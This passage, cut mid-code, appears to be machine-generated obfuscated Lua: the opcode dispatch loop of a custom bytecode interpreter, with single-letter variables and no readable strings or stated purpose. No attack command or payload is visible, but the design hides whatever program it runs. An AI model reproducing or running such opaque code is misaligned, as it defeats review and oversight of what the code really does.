end;l[n]=h()[f[e[3]]];elseif i>225 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=249 then if i<=237 then if i<=231 then if i<=228 then if i>227 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else n=n+e[3];end;elseif i<=229 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];local n=l[e[3]];l[t+1]=n;l[t]=n[f[e[4]]];if t+1>o then o=t+1 end;elseif i>230 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local n;i=e[2];t={};local n=0;local d=i+e[3]-1;for e=i+1,d do n=n+1;t[n]=l[e];end;local d={l[i](c(t,1,d-i))};local f,d=d,#d;d=i+e[4]-2;n=0;for e=i,d do n=n+1;l[e]=f[n];end;o=d;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=234 then if i<=232 then h()[f[e[3]]]=l[e[2]];elseif i>233 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=s+i-1;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];t={};a=0;s=o;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];if(l[e[3]]==l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;else if(l[e[3]]~=f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=235 then local n=e[2];if n>o then o=n end;l[n]=#l[e[3]];elseif i>236 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local s=i+e[3]-1;for e=i+1,s do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];end;elseif i<=243 then if i<=240 then if i<=238 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};h=0;a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local f={l[i](c(t,1,a-i))};local t,f=f,#f;f=i+e[4]-2;h=0;for e=i,f do h=h+1;l[e]=t[h];end;o=f;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>239 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=241 then local n;local d=e[2];local f={};local n=0;local e=d+e[3]-1;for e=d+1,e do n=n+1;f[n]=l[e];end;local e={l[d](c(f,1,e-d))};local f,e=e,#e;e=e+d-1;n=0;for e=d,e do n=n+1;l[e]=f[n];end;o=e;elseif i>242 then l[e[2]][f[e[3]]]=l[e[4]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=246 then if i<=244 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>245 then local t=e[2];if t>o then o=t end;l[t]={c({},1,e[3])};n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]={c({},1,e[3])};n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]={c({},1,e[3])};n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=247 then n=n+e[3];elseif i>248 then n=n+e[3];else local o=e[2];l[o]=l[o]-l[o+2];n=n+e[3];end;elseif i<=260 then if i<=254 then if i<=251 then if i>250 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else if(l[e[3]]~=f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=252 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>253 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=257 then if i<=255 then l[e[2]][f[e[3]]]=l[e[4]];elseif i>256 then local o=e[2];l[o]=l[o]-l[o+2];n=n+e[3];else do return end;end;elseif i<=258 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>259 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n;local d=e[2];local f={};local n=0;local t=o;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=266 then if i<=263 then if i<=261 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];elseif i>262 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=264 then for e=e[2],e[3]do l[e]=nil;end;elseif i>265 then local o=e[2];local d=o+e[3]-2;local n={};local e=0;for o=o,d do e=e+1;n[e]=l[o];end;do return c(n,1,e)end;else local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local a={l[i](c(t,1,a-i))};local r,a=a,#a;a=i+e[4]-2;h=0;for e=i,a do h=h+1;l[e]=r[h];end;o=a;n=n+1;e=d[n];i=e[2];s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};h=0;a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;end;elseif i<=269 then if i<=267 then local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];elseif i>268 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=270 then local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local a={l[i](c(t,1,a-i))};local r,a=a,#a;a=i+e[4]-2;h=0;for e=i,a do h=h+1;l[e]=r[h];end;o=a;n=n+1;e=d[n];i=e[2];s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};h=0;a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;elseif i>271 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];end;elseif i<=317 then if i<=294 then if i<=283 then if i<=277 then if i<=274 then if i>273 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local r=i+e[3]-1;for e=i+1,r do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,r-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;end;elseif i<=275 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];elseif i>276 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]]*l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];end;elseif i<=280 then if i<=278 then if(l[e[3]]~=f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>279 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=281 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];elseif i>282 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];end;elseif i<=288 then if i<=285 then if i>284 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=286 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>287 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=291 then if i<=289 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];elseif i>290 then n=n+e[3];else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=292 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];for e=e[2],e[3]do l[e]=nil;end;n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];elseif i>293 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 